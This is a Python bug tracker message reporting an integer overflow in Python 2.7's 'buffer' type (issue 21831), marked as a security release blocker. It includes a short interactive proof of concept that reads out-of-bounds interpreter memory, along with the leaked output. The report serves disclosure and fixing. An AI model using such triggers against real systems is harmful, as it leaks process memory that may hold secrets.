New submission from Benjamin Peterson:
Reported by Chris Foster on the security list:
$ ./python
Python 2.7.7+ (2.7:8e0b7393e921, Jun 24 2014, 03:01:40)
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a = bytearray('hola mundo')
>>> b = buffer(a, 0x7fffffff, 0x7fffffff)
>>> print repr(b[:0x100])
"\x00\x08\x11\x00\x00\x00\x00\x00\x00\x00\xa00_\xf7\x10\x00\x00\x00i\x03\x00\x00\x02\x00\x00\x00\xa0\xd1\x18\x08I\x03\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00Directory
tree walk with callback function.\n\n For each directory in the directory
tree rooted at top (including top\n itself, but excluding '.' and '..'),
call func(arg, dirname, fnames).\n dirname is the na"
----------
components: Interpreter Core
messages: 221392
nosy: benjamin.peterson
priority: release blocker
severity: normal
status: open
title: integer overflow in 'buffer' type allows reading memory
type: security
versions: Python 2.7
_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue21831>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
